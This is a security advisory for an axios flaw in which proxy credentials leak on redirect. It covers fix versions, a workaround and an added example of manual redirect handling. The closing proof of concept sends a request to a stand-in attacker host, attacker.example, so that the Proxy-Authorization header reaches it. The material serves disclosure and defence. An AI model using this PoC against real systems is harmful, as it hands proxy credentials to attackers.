Insertion of Sensitive Information Into Sent Data Affecting axios package, versions <0.32.0, >=1.0.0 <1.16.0


Severity

high (CVSS assessment by Snyk's Security Team)

Threat Intelligence

  • Exploit Maturity: Proof of Concept
  • EPSS: 0.55% (43rd percentile)

  • Snyk ID: SNYK-JS-AXIOS-17172681
  • Published: 5 Jun 2026
  • Disclosed: 4 Jun 2026
  • Credit: Ngocnn97

Introduced: 4 Jun 2026

CVE-2026-44486
CWE-201

How to fix?

Upgrade axios to version 0.32.0, 1.16.0 or higher.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain sensitive proxy credentials by controlling a redirect target and causing the application to follow a redirect from a proxied request to a direct connection, resulting in the Proxy-Authorization header being sent to the attacker's server.

Note:

This is only exploitable if the application is running in Node.js with automatic redirects enabled and uses an authenticated proxy configuration, where the redirect target resolves to a direct connection (such as when HTTPS_PROXY is unset or excluded by NO_PROXY).

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, or by ensuring proxy environment variables are configured consistently across protocols to prevent unexpected changes from proxied to direct connections.
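The workaround above, as an added example that is not part of the advisory or the axios project: redirects are followed by hand with maxRedirects: 0, so each hop is a fresh request whose proxy selection is made for that hop's own URL, and a small check flags the inconsistent HTTP_PROXY/HTTPS_PROXY setup the note describes. The `client` parameter is assumed to be an axios instance (a constructed fake stands in for it here so the code runs offline), and all function names are assumptions.

```javascript
// Added example (not from the advisory or the axios project): the advisory's workaround of
// maxRedirects: 0 plus manual redirect handling. Every hop is a fresh request, so the
// client chooses the proxy (and any Proxy-Authorization header) for that hop's own URL
// instead of carrying the first hop's proxy headers onto a direct connection.
// `client` is assumed to expose an axios-compatible get(url, config) -> {status, headers}.

// The advisory's other mitigation as a check: proxy settings that differ between protocols
// are what turn a redirect into a proxied-to-direct hop.
function proxyEnvIsConsistent(env = process.env) {
  const httpProxy = env.HTTP_PROXY || env.http_proxy;
  const httpsProxy = env.HTTPS_PROXY || env.https_proxy;
  return Boolean(httpProxy) === Boolean(httpsProxy);
}

async function getWithManualRedirects(client, url, maxHops = 5) {
  const hops = [url];
  let current = url;
  for (let i = 0; i <= maxHops; i++) {
    const res = await client.get(current, {
      maxRedirects: 0,                              // the adapter must not follow for us
      validateStatus: (s) => s >= 200 && s < 400,   // 3xx is a result here, not an error
    });
    const location = res.headers && res.headers.location;
    if (res.status < 300 || !location) {
      return { response: res, hops };
    }
    current = new URL(location, current).toString(); // resolve relative Location headers
    hops.push(current);
  }
  throw new Error(`gave up after ${maxHops} redirects starting from ${url}`);
}

// Constructed stand-in for an axios instance so the example runs offline; it records
// every request so a caller can confirm each hop was issued with maxRedirects: 0.
function makeFakeClient(table) {
  const calls = [];
  return {
    calls,
    async get(url, config) {
      calls.push({ url, maxRedirects: config.maxRedirects });
      const entry = table[url];
      if (!entry) throw new Error(`no fixture for ${url}`);
      return entry;
    },
  };
}
```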

PoC

```javascript
import axios from 'axios';

// Authenticated proxy for HTTP only; with HTTPS_PROXY unset, HTTPS targets connect directly.
process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

// The proxied request is redirected to a direct connection, which still carries Proxy-Authorization.
await axios.get('http://attacker.example/start');
```
